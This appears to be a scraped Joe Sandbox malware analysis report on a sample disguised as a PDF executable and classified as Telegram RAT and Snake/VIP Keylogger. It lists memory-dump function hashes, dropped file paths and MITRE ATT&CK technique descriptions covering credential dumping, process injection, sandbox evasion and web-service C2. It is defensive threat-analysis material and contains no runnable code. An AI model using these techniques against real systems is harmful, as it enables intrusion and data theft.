Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637f88edad323c0917bbb8930df32388318c4aa76dea872bb4f63554719fd84b
Instruction ID: af341c3f245f480ea3aec749e2184061bc6030c57a5bbd37fb1e9ea098a87dbc
Opcode Fuzzy Hash: 637f88edad323c0917bbb8930df32388318c4aa76dea872bb4f63554719fd84b
Instruction Fuzzy Hash: FF0128327001556FCB229E699C10AEF7FA6EFCD640B08815AF545C7284CF718C129B90

Function 0168E8E8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4de89ab5de7428dc20140c34097a45e5e4c086bb35898059c73471eecf0d8c34
Instruction ID: 955cdd12fccd9d08cd06b63c5977fcfb9d1bc773cd5d59aa5381a4f226a45cee
Opcode Fuzzy Hash: 4de89ab5de7428dc20140c34097a45e5e4c086bb35898059c73471eecf0d8c34
Instruction Fuzzy Hash: 2E112574D0420A9FDF41CFA8E8859EEBBB1FB8A300F10816AD954A3360D7385E56DF91

Function 0168FDFB Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbae3cbfc9381618324ba7f867c4c33d82bade257aece735c5a2d0d08a12ac7
Instruction ID: 005814352cad1d6fdbb62bc14841f40a07536d20e338770c5aa902766ff2b2ef
Opcode Fuzzy Hash: 4fbae3cbfc9381618324ba7f867c4c33d82bade257aece735c5a2d0d08a12ac7
Instruction Fuzzy Hash: 5001D831E083446FDB225F75DC406AEBFB1EF46620F0541EAE68187682D7786815CBA1

Function 0168ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a858927fdeab78ef10a777ba43a6eefa8fd08e72d248953b3dea9dede9bc5aa
Instruction ID: 22ec4cbbf4ae6ad5fd1379d987f8726c428714ca454f90988d003962382b7fa0
Opcode Fuzzy Hash: 6a858927fdeab78ef10a777ba43a6eefa8fd08e72d248953b3dea9dede9bc5aa
Instruction Fuzzy Hash: D7F0F6313002104B97267A6E9C54A2ABADEEFC8A55355417BEE09C7361EF60CC03C780

Function 0168FE88 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f098ecf158f143ff55f909b2fb687438debc08e106be09e668ef37d2236d19
Instruction ID: 553180d8c4bcc78140aa1abd25ca76da226076e23dcd45db3811eeaa04a430a9
Opcode Fuzzy Hash: d1f098ecf158f143ff55f909b2fb687438debc08e106be09e668ef37d2236d19
Instruction Fuzzy Hash: 6001EC717006119F8724DF6ED48491AB7F6EF8961430586A9E009CB772DB70ED45DB90

Function 0168FE10 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e037e92c03e4492c1dd1d08e829197567201b761b17ebadc16bba498bac3191b
Instruction ID: 650c5615a5953192de45d2e56179f71102b8036f899f46bc15475f740af9acdd
Opcode Fuzzy Hash: e037e92c03e4492c1dd1d08e829197567201b761b17ebadc16bba498bac3191b
Instruction Fuzzy Hash: 0BF0C231E00618AFDB21AF68DC407AFBFB5FB84620F44426EE60597781DB34A405CB90

Function 01689C2C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18352d22637b16b535f01bffa87c0d9c05dc4f040d0413b355f17cd54d923c0
Instruction ID: 36b4b923a549f91fb02ef17a0a7861f3d9c9f3add59a04b8b40f0b0dfd7fb6ad
Opcode Fuzzy Hash: a18352d22637b16b535f01bffa87c0d9c05dc4f040d0413b355f17cd54d923c0
Instruction Fuzzy Hash: B1F08C32A001189FCB14DF69DC08AFEBBF6EBC8324F00C12AEA08D3214D7314A258B90

Function 01686739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c31579c51eb803c6a5f6599e09a31a3a8a94e5958a602a7ce8155498a803d91
Instruction ID: 2b790b1df0d7161605bf83e06d75e20412aefc432347a2178d09960f5db85289
Opcode Fuzzy Hash: 3c31579c51eb803c6a5f6599e09a31a3a8a94e5958a602a7ce8155498a803d91
Instruction Fuzzy Hash: F7E0CD3000C3850FD70267785C625817F79DFC1100F4485F1D0400F16BCA7968568791

Function 016828A2 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1543b31be6f29a699bb3da1238625135c8af9e5716dff075c64f7589e3c2aa35
Instruction ID: d3305efa332e502a79e672c7e0414e40aba04923cf8d015e80b9d8d4e17c1d5f
Opcode Fuzzy Hash: 1543b31be6f29a699bb3da1238625135c8af9e5716dff075c64f7589e3c2aa35
Instruction Fuzzy Hash: 69E02631E543A68BCB01EBF09C100EEBB34ADD2221B58859BC0A537090EB30621AC7A3

Function 016828B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efdd3880e716a70faee64bc584c440e841db5a0f31b5e855859218b9caa2e06b
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: efdd3880e716a70faee64bc584c440e841db5a0f31b5e855859218b9caa2e06b
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 0168AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab1b61c06a31221184b5866ca0dc1c63e1e9775e0f17d99bded96a436b0f698
Instruction ID: 72905df3068ac5a4c1593190b350f2c9fe1f64f0adfdcdc93d2127e2c5e7aceb
Opcode Fuzzy Hash: cab1b61c06a31221184b5866ca0dc1c63e1e9775e0f17d99bded96a436b0f698
Instruction Fuzzy Hash: 9AD0673BB40018DFCB149F99EC408DDF7B6FB98221B548116E915A3265C631A925DB94

Function 01686748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e98c2cdd4b4777a93845d746fe8cb750d27913a8844b09c9236e830a11ee1a
Instruction ID: 23ff8c828d257ef7df7648e41b0dd3da5d9792ffc290665c69dc0b07ad053fdc
Opcode Fuzzy Hash: e1e98c2cdd4b4777a93845d746fe8cb750d27913a8844b09c9236e830a11ee1a
Instruction Fuzzy Hash: A9C012310443094EC601FB65ED55995B72EE6D0200B40D93095050666DDF7D6C994BD5

Non-executed Functions

Function 01686920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 01686952
\;^q, xrefs: 0168692C
\;^q, xrefs: 0168695E
\;^q, xrefs: 01686936

Memory Dump Source

Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 954e8d84d147530e456a5d13679e4d7bf570881295767e2d22ff9c721ff73ed6
Instruction ID: e746e19c9fecdf519cf638d1fc26083cf31f378021ef54e9a3ec61d6dead5134
Opcode Fuzzy Hash: 954e8d84d147530e456a5d13679e4d7bf570881295767e2d22ff9c721ff73ed6
Instruction Fuzzy Hash: E101DF31B401068FCF24AE2CC944AA677EBAF88A60725466AE546CF3F5DB31DC428780

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PDF-3093900299039 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ozujgi0.gtu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lybjmzsn.0fu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rp4cuuis.oja.ps1

Windows Analysis Report
PDF-3093900299039 pdf.exe

Function 06CE1C80 Relevance: 6.9, Strings: 5, Instructions: 649
COMMON

Function 04DDFB18 Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre